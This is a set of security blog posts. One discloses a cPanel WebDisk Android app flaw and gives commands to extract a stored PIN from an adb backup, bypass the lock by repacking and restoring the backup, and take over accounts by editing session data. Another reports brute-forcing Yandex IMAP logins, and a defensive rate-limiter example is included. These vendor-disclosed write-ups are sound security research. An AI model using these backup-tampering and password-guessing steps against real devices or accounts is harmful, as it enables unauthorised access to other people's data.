<strong>3) Old Browsers Compatiblity</strong><br />
<br />
This is a mitigation rather than a prevention: the application can refuse to serve users on older browsers, which removes the population the attack works against.<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com3tag:blogger.com,1999:blog-3462277729309057123.post-76533325074995170672018-06-29T10:35:00.000+05:302019-09-13T13:04:19.859+05:30Backup Vulnerability Vulnerability Exploitation<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5iLLAMbN1QDjYGFaiCoy3-0uxRmbXCGZAT_753vGm-U9gWy2zpLuFWIXAzonSKj-ceYNcUKsi8qc3lf5GTDqjthcLZ2eV1RuVTquDvTfUWZOU5PGE0XfwNWlvbBoAOhhZIJcYt5CfdqQ/s1600/Screen+Shot+2017-09-05+at+4.08.52+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="657" data-original-width="427" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5iLLAMbN1QDjYGFaiCoy3-0uxRmbXCGZAT_753vGm-U9gWy2zpLuFWIXAzonSKj-ceYNcUKsi8qc3lf5GTDqjthcLZ2eV1RuVTquDvTfUWZOU5PGE0XfwNWlvbBoAOhhZIJcYt5CfdqQ/s320/Screen+Shot+2017-09-05+at+4.08.52+PM.png" width="207" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
cPanel WebDisk Android App 4.0 : Backup Vulnerability</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Hello folks,</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
This vulnerability concerns insecure data storage combined with a security misconfiguration, exploitable through Android's backup functionality.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
We all know that many mobile applications store user credentials or other sensitive data on the device in clear text, which is not good practice.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
But many of us also know that reading that data normally requires root privileges or special conditions such as debugging being enabled. So the common view is that clear-text storage on its own is not an issue, and many security teams and bug bounty programs explicitly exclude findings that require a rooted or jailbroken device.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<a name='more'></a><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
But what if this data is accessible to a normal user, with no root privileges required?</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
So let us look at the conditions I found in cPanel WebDisk Android App 4.0 that lead to a PassCode security bypass.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
First below was my Test Environment </div>
<div class="separator" style="clear: both; text-align: left;">
App Name & Version = cPanel WebDisk Android Application Version 4.0 </div>
<div class="separator" style="clear: both; text-align: left;">
Tested On = Android 5.0 (Non Rooted Device+Rooted)</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
The cPanel WebDisk Android application can set a PIN code to prevent unauthorised access. It can be found under Application > Settings > Passcode Lock (see the screenshot below).</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlsHl5KA1I1jD3EDNMbPXPTT1ZlSxqsR4-SAvHZUmfbEpyNGXJ1q5xG9H5_tbwpFDLSKZV2NQa9R3RS07o6dUNz0KVgRARw9CoSaF0Pnk4TtYidCXxwXKFpsEz46JQkaqvqD1MpVr25mc/s1600/Screen+Shot+2017-09-05+at+4.19.51+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="631" data-original-width="429" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlsHl5KA1I1jD3EDNMbPXPTT1ZlSxqsR4-SAvHZUmfbEpyNGXJ1q5xG9H5_tbwpFDLSKZV2NQa9R3RS07o6dUNz0KVgRARw9CoSaF0Pnk4TtYidCXxwXKFpsEz46JQkaqvqD1MpVr25mc/s320/Screen+Shot+2017-09-05+at+4.19.51+PM.png" width="217" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
After enabling it, the cPanel WebDisk Android application asks for the PassCode every time you return to it after exiting.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6FK5eJbFOXYzEU2bsVRW5OblFzNMrQzAFp6vEjyCz9QlpWKnj93alNHPffEmaedz4L8tQkSyfuuVe7bmwOPxTApCz81HjR3pnSuAAcI_VkFjTyg-tN81BMJOyKV-kWcht1OZ5PBWvSco/s1600/Screen+Shot+2017-09-05+at+4.13.18+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="655" data-original-width="426" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6FK5eJbFOXYzEU2bsVRW5OblFzNMrQzAFp6vEjyCz9QlpWKnj93alNHPffEmaedz4L8tQkSyfuuVe7bmwOPxTApCz81HjR3pnSuAAcI_VkFjTyg-tN81BMJOyKV-kWcht1OZ5PBWvSco/s320/Screen+Shot+2017-09-05+at+4.13.18+PM.png" width="208" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Vulnerability Details:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Android has an application attribute called "allowBackup" which controls whether the app's data can be backed up, by adb or by another backup agent. It is declared on the application element in AndroidManifest.xml, e.g. <b>android:allowBackup="true"</b>.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
So if AndroidManifest.xml contains <b>allowBackup="true"</b>, the application's data can be backed up. That is the case for the cPanel WebDisk Android app.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
First I backed up the application with <b>adb backup <package> -f <outfile.ab></b>:</div>
<div class="separator" style="clear: both; text-align: left;">
<b>adb backup net.cpanel.webdisk -f disk.ab</b> (USB debugging must be enabled on the device; no root is needed). After running this command the device shows the backup confirmation screen below; tap "Back up my data".</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXeX_pnIK85mXBC9J0Vm9wz1I6vYt9GH4rC-hYDL8rZ1z4VezDeq18K3FG7QknAGE_wuwWILGYB2jrPS8M3yUMkaLeUNv4dQBNbHHL9Aexa8hk4QtHRkec1cIjRxZobnpTNr0kadhRixo/s1600/Screen+Shot+2017-09-05+at+3.41.55+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="759" data-original-width="1280" height="378" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXeX_pnIK85mXBC9J0Vm9wz1I6vYt9GH4rC-hYDL8rZ1z4VezDeq18K3FG7QknAGE_wuwWILGYB2jrPS8M3yUMkaLeUNv4dQBNbHHL9Aexa8hk4QtHRkec1cIjRxZobnpTNr0kadhRixo/s640/Screen+Shot+2017-09-05+at+3.41.55+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
This created a file called "disk.ab". Next I converted the backup file into a tar archive with Android Backup Extractor:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>java -jar abe.jar unpack disk.ab disk.tar</b> (on a Windows machine, run cmd.exe as Administrator).</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXKtomyTs-V99dx1x2TFoj8Q7TIGyW6YvXBMVsZiU2is6qxRMKacAj00zVWtRMcC3WVv0iZ-Gn7qzmBV2hzJY0FdU2Rus7yOnjZIgo9oIZ29sMTjOpYkGc4RtNUlVYOpFlnQ9pONFGcO0/s1600/tar.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="49" data-original-width="692" height="44" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXKtomyTs-V99dx1x2TFoj8Q7TIGyW6YvXBMVsZiU2is6qxRMKacAj00zVWtRMcC3WVv0iZ-Gn7qzmBV2hzJY0FdU2Rus7yOnjZIgo9oIZ29sMTjOpYkGc4RtNUlVYOpFlnQ9pONFGcO0/s640/tar.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
This produced a tar file (disk.tar), which I then extracted with the following command:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>tar xvf disk.tar</b> This created a new folder called "apps" containing the full backup of the "cPanel WebDisk Android App".</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOWPCV6LUtxvSEaZGePTjzw7O4WeQa9vRD3y8M718330YL7DUE7koLb9UdpGiqY8pGCTXmnA377A45HWpyuHc6THaJjci2dQ3CGmVSDrAN-5V1O7I-cXLDVm5BpQxq2toLQDk7oLNDDFY/s1600/compress.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="1280" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOWPCV6LUtxvSEaZGePTjzw7O4WeQa9vRD3y8M718330YL7DUE7koLb9UdpGiqY8pGCTXmnA377A45HWpyuHc6THaJjci2dQ3CGmVSDrAN-5V1O7I-cXLDVm5BpQxq2toLQDk7oLNDDFY/s640/compress.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Finally I moved to the "/apps/net.cpanel.webdisk/sp" folder and found a file "net.cpanel.webdisk_preferences.xml" which contains the PassCode value, which was "1337".</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4TkRgFYyQ7wpOpTn2rslCdKRA7KOGN8KG_1qnPi6bXsTytVx2oOJYxjcswTc9ZHf5Djvlq-J5i5zGxSQ7pCTPeAqqaBXCHM9e4fzA3tYGq0KUMpceBfEtFJIOQoExeP0IvTqjAjV9waY/s1600/pin.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="653" data-original-width="1015" height="410" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4TkRgFYyQ7wpOpTn2rslCdKRA7KOGN8KG_1qnPi6bXsTytVx2oOJYxjcswTc9ZHf5Djvlq-J5i5zGxSQ7pCTPeAqqaBXCHM9e4fzA3tYGq0KUMpceBfEtFJIOQoExeP0IvTqjAjV9waY/s640/pin.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Using this PassCode I was able to reach the dashboard of the application.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit6LAu3Z5DSFJrra2W4YsQgxerAO3UYsUPJhCeozumFGQ_TCeh8te_PQbQfizWUIKODRoa4ZHcomcVHzt2EFKHkONv7ZnpyW8hb3134XPE3J7daAZtf3VQzOrQB9bJ5gns28vo1jbaMnM/s1600/dash.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="660" data-original-width="428" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit6LAu3Z5DSFJrra2W4YsQgxerAO3UYsUPJhCeozumFGQ_TCeh8te_PQbQfizWUIKODRoa4ZHcomcVHzt2EFKHkONv7ZnpyW8hb3134XPE3J7daAZtf3VQzOrQB9bJ5gns28vo1jbaMnM/s320/dash.png" width="207" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
POC Video </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/BMwccCxaR2U/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/BMwccCxaR2U?feature=player_embedded" width="320"></iframe></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
You can download this version of the APK from here to reproduce the issue - <a href="https://drive.google.com/file/d/0B-LjC3oY6tUpQU9vS1hBM1ZRSWc/view?usp=sharing">https://drive.google.com/file/d/0B-LjC3oY6tUpQU9vS1hBM1ZRSWc/view?usp=sharing</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="color: #a64d79;">Little Interesting Points</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #990000;">If this scenario the PIN code was saved as clear text format, so you can enter it in the application. But what happened if the PIN code is stored in encryption format ! </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #990000;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
1) In that case you can remove the whole PIN-code block from the preferences XML, or replace the stored value with any garbage value. If you are able to reverse the application, take a quick look at the encryption technique being used and replace the PIN value in the preferences XML file with one of your own, then save it. Either way you end up with an XML file without a working PIN lock value. Then perform the steps below. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
2) <b>tar -tf disk.tar > disk.list </b></div>
<div class="separator" style="clear: both; text-align: left;">
3) <b>star -c -v -f disk_new.tar -no-dirslash list=disk.list</b></div>
<div class="separator" style="clear: both; text-align: left;">
4) <b>java -jar abe.jar pack disk_new.tar disk_new.ab </b></div>
<div class="separator" style="clear: both; text-align: left;">
5) <b>adb restore disk_new.ab (</b>This command will prompt on your device to restore the backup as respect to that application)</div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #990000;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #990000;">In all 5 steps, we have simply remove the PIN Code block from the xml and re-pack it as android backup file and finally we restore that backup into the device. Now if all works well you will get application dashboard/home screen access without prompting for any Pass Code.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #990000;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #990000;">Some times, Backup also expose the API access token & some interesting points as well of the user just in case if the application is protected by any Authentication Lock functionality. You can get the API Access token and make calls on behalf of the user.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: #990000;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue;">One of the scenario I encounter with is, the application was doing some authentication from internal storage database for user authentication. So once we backup the application and looked into the DB file, we found some session management data. To verify my doubt we just changed the value of username with victimusername and restore the backup. </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue;">Once the devices is restarted, we accessed the application and found our self into the victim account. </span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue;">As we can see we have tons of scenarios where we can exploit this functionality.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: blue;">Permission is taken from cPanel Security Team for public disclosure.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
Comments are always welcome. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
</div>
<p>Author: Narendra Bhati (<a href="http://www.blogger.com/profile/07150714543762295098">Blogger profile</a>)</p>
<h2>Yandex IMAP Brute Forcing (No Rate Limit For Login Attempts)</h2>
<p>Published 2017-09-26, last updated 2017-09-26.</p>
<div dir="ltr" style="text-align: left;" trbidi="on">
Hello Guyzssss,<br />
<div>
<br /></div>
<div>
I am not into bug bounty so much, but while using one of the Yandex services I found that there was no rate limit deployed for login attempts on their IMAP authentication.</div>
<div>
<br /></div>
<div>
This means a user can make unlimited login attempts against their IMAP service, which is the service used to access Yandex mail from other accounts, just like other providers.</div>
<div>
<br /></div>
<div>
For example, Gmail users can import a Yandex account's emails using IMAP authentication.<br />
<a name='more'></a></div>
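The control that was missing here is throttling of failed logins. As an added example that is not part of the original post and not Yandex's code, the following Node.js module implements a sliding-window limiter keyed per account and per source address, with a lockout, of the kind an IMAP (or any other) login endpoint should sit behind. The thresholds, the account name alice and the address 203.0.113.7 are constructed demo values, and time is passed in explicitly so the behaviour is deterministic.

```javascript
// Added example (not from the original post, not Yandex's code): a sliding-window
// limiter for authentication attempts, keyed per account and per source IP.
// All timestamps are milliseconds supplied by the caller (e.g. Date.now()).

class LoginRateLimiter {
  constructor({ maxAttempts = 5, windowMs = 60000, lockoutMs = 15 * 60000 } = {}) {
    this.maxAttempts = maxAttempts;
    this.windowMs = windowMs;
    this.lockoutMs = lockoutMs;
    this.failures = new Map();    // key -> failure timestamps still inside the window
    this.lockedUntil = new Map(); // key -> timestamp at which the lockout ends
  }

  // Drop failures older than the window; return the remaining list.
  _recent(key, now) {
    const list = (this.failures.get(key) || []).filter(t => now - t < this.windowMs);
    this.failures.set(key, list);
    return list;
  }

  // Call before verifying credentials. True if the attempt may proceed.
  allow(key, now) {
    const until = this.lockedUntil.get(key);
    if (until !== undefined) {
      if (now < until) return false;
      this.lockedUntil.delete(key);   // lockout expired: start with a clean window
      this.failures.delete(key);
    }
    return this._recent(key, now).length < this.maxAttempts;
  }

  // Call after a failed credential check; starts a lockout at the threshold.
  recordFailure(key, now) {
    const list = this._recent(key, now);
    list.push(now);
    if (list.length >= this.maxAttempts) this.lockedUntil.set(key, now + this.lockoutMs);
  }

  // Call after a successful login to clear the counter for that key.
  recordSuccess(key) {
    this.failures.delete(key);
    this.lockedUntil.delete(key);
  }
}

// Wraps a credential check so the limiter is consulted for both the account and
// the client address; either one being over the limit blocks the attempt.
function attemptLogin(limiter, { user, ip, password }, checkPassword, now) {
  const keys = [`user:${user}`, `ip:${ip}`];
  if (!keys.every(k => limiter.allow(k, now))) {
    return { ok: false, reason: 'rate-limited' };
  }
  if (checkPassword(user, password)) {
    limiter.recordSuccess(`user:${user}`); // the per-IP counter is deliberately kept
    return { ok: true, reason: 'authenticated' };
  }
  keys.forEach(k => limiter.recordFailure(k, now));
  return { ok: false, reason: 'bad-credentials' };
}

// Constructed demo: a fixed password check and a burst of wrong guesses from one client.
function demo() {
  const limiter = new LoginRateLimiter({ maxAttempts: 5, windowMs: 60000, lockoutMs: 900000 });
  const check = (user, pw) => user === 'alice' && pw === 'correct horse';
  const client = { user: 'alice', ip: '203.0.113.7' };
  const results = [];
  for (let i = 0; i < 7; i++) {
    results.push(attemptLogin(limiter, { ...client, password: `guess${i}` }, check, 1000 * i).reason);
  }
  // The right password is refused while the lockout is active...
  results.push(attemptLogin(limiter, { ...client, password: 'correct horse' }, check, 10000).reason);
  // ...and accepted once it has expired.
  results.push(attemptLogin(limiter, { ...client, password: 'correct horse' }, check, 10000 + 900000).reason);
  return results;
}

console.log(demo().join(', '));
```

The limiter state lives in process memory here; a real deployment keeps it in a shared store so that every front end sees the same counters, and alerts on accounts or addresses that hit the lockout repeatedly.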
<div>
<br /></div>
<div style="text-align: center;">
POC</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
1) Intercepted the request (parameters) for adding Yandex as an IMAP account from a third-party website.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWv0rzqRx1q8YaPctrea5Z5oQmFtaef-QBsSU8E7BVm89rc8xtFeDbi5RqHRXcza2ybnNKs7EQvzs8WQQ7wyTqmiQVkaVkg_hE1aIqlbsFpESRWm3z7h1am5o1CtwH94X9_53vgySQF88/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="66" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWv0rzqRx1q8YaPctrea5Z5oQmFtaef-QBsSU8E7BVm89rc8xtFeDbi5RqHRXcza2ybnNKs7EQvzs8WQQ7wyTqmiQVkaVkg_hE1aIqlbsFpESRWm3z7h1am5o1CtwH94X9_53vgySQF88/s640/1.png" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
2) Set up some payloads, including one valid password.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBIw7E4J8J9YhTVM7xrFovaPU5p_DsjuFVIfncrtB3kbD_-Nvb7RUZgvbhAxkULO0fvbTTseplqFVwnRKrXjiank7w28gwkjCxjQs7eCUP7TNhOW605WfEn_hWoILBKyzD5zuKepCtI-Q/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBIw7E4J8J9YhTVM7xrFovaPU5p_DsjuFVIfncrtB3kbD_-Nvb7RUZgvbhAxkULO0fvbTTseplqFVwnRKrXjiank7w28gwkjCxjQs7eCUP7TNhOW605WfEn_hWoILBKyzD5zuKepCtI-Q/s400/2.png" width="400" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
3) Intruder attack (difference between a valid and an invalid password attempt).</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieMs_kBqT_lhZDi7YSkTrj857uDNfDhBxK_TRCMfHwXFEMe0_im1Pyov6RP95KnZoq6jFudZWwAm5mnACSOB0oLMuPGltimd3tYjHjRtySMGxW5V0MVHvsxgXklwIDxTc7HjNyn6T4ukE/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieMs_kBqT_lhZDi7YSkTrj857uDNfDhBxK_TRCMfHwXFEMe0_im1Pyov6RP95KnZoq6jFudZWwAm5mnACSOB0oLMuPGltimd3tYjHjRtySMGxW5V0MVHvsxgXklwIDxTc7HjNyn6T4ukE/s640/3.png" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div style="text-align: center;">
The issue was acknowledged by the Yandex Security Team.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_dR65RPo11WlvyGavr-KZ2_4vewYW0JxIPLDfdOo_vbEuPoJuAk1THfqaAPgawmddE9BHgtMDdoDf6GtVdLn7tyyaBFvHUPw2bCDC8JC2GxTJL1qfRlLQIj7HvRLg-twItTqxlQIt7s8/s1600/yandex+mail.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_dR65RPo11WlvyGavr-KZ2_4vewYW0JxIPLDfdOo_vbEuPoJuAk1THfqaAPgawmddE9BHgtMDdoDf6GtVdLn7tyyaBFvHUPw2bCDC8JC2GxTJL1qfRlLQIj7HvRLg-twItTqxlQIt7s8/s640/yandex+mail.PNG" width="640" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div>
<br /></div>
</div>
<p>Author: Narendra Bhati (<a href="http://www.blogger.com/profile/15834240919754131768">Blogger profile</a>)</p>
<p>Published 2017-04-23, last updated 2017-04-23.</p>
<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkGjowmm5lIjqYSF0kGrxq6cQzz3LP1SPDMmIRpMaszz1hN26E7g67G9DNiq52N7rCUqHZdaqODq8hk9qbMMtiVesZ1xpYlTojdVo_1fbVUBzEqpmkaLfwzhWOvRQ2Gj3FVPuJXkbrEPw/s1600/nodejs_logo_green.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="274" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkGjowmm5lIjqYSF0kGrxq6cQzz3LP1SPDMmIRpMaszz1hN26E7g67G9DNiq52N7rCUqHZdaqODq8hk9qbMMtiVesZ1xpYlTojdVo_1fbVUBzEqpmkaLfwzhWOvRQ2Gj3FVPuJXkbrEPw/s640/nodejs_logo_green.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h2 style="clear: both; text-align: center;">
Pentesting Node.js Application : Nodejs Application Security</h2>
<div class="separator" style="clear: both; text-align: left;">
Hello folks, today we will see how to pentest a Node.js application: attacking a Node.js application.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
As we know, JavaScript is a very common and important language, and a lightweight one that handles most of our tasks very easily.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
But we also know that great efficiency comes with great risk. Node.js is a server-side runtime for JavaScript.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
According to <a href="https://en.wikipedia.org/wiki/Node.js" target="_blank">Wiki</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Node.js is an open-source, cross-platform JavaScript run-time environment for executing JavaScript code server-side. Historically, JavaScript was used primarily for client-side scripting, in which scripts written in JavaScript are embedded in a webpage's HTML, to be run client-side by a JavaScript engine in the user's web browser. Node.js enables JavaScript to be used for server-side scripting, and runs scripts server-side to produce dynamic web page content before the page is sent to the user's web browser. Consequently, Node.js has become one of the foundational elements of the "JavaScript everywhere" paradigm, allowing web application development to unify around a single programming language, rather than rely on a different language for writing server side scripts.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Today we will look at some of the vulnerabilities that can be exploited in a Node.js application. We will also look at the source code for a better understanding.</div>
<a name='more'></a><br />
<div class="separator" style="clear: both; text-align: left;">
1) You can install Node.js yourself using the easy installation process from here - <a href="https://nodejs.org/en/download/">https://nodejs.org/en/download/</a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
2) In our demo I have used the Express framework for Node.js. You can install it on your PC as follows.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
A) Create a directory to hold your application code and make it your working directory.</div>
<div class="separator" style="clear: both; text-align: left;">
$ mkdir nodeapp</div>
<div class="separator" style="clear: both; text-align: left;">
$ cd nodeapp</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
B) Run the npm init command to create a package.json file for your application.</div>
<div class="separator" style="clear: both; text-align: left;">
$ npm init</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisI8CzcErSRxgp6Meq1FnHqmZUPJb12rIcW0T-j6GGzorkGbyyU0TfoHYhgPgUC4WoEwGtymPKG4unwIavnwnYBH-EehkWrvF0HQoXhyIjvQnQ5KU1bh9lv4l2jnqgm6dP_tfhNpgVT0k/s1600/Screen+Shot+2017-04-23+at+12.57.44+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="362" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEisI8CzcErSRxgp6Meq1FnHqmZUPJb12rIcW0T-j6GGzorkGbyyU0TfoHYhgPgUC4WoEwGtymPKG4unwIavnwnYBH-EehkWrvF0HQoXhyIjvQnQ5KU1bh9lv4l2jnqgm6dP_tfhNpgVT0k/s640/Screen+Shot+2017-04-23+at+12.57.44+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
C) This command will ask you for several things, such as the name and version of your application. You can enter the details or keep the defaults by pressing Enter at every prompt.<br />
<br />
D) Now install Express in the nodeapp directory:<br />
$ npm install express --save<br />
<br />
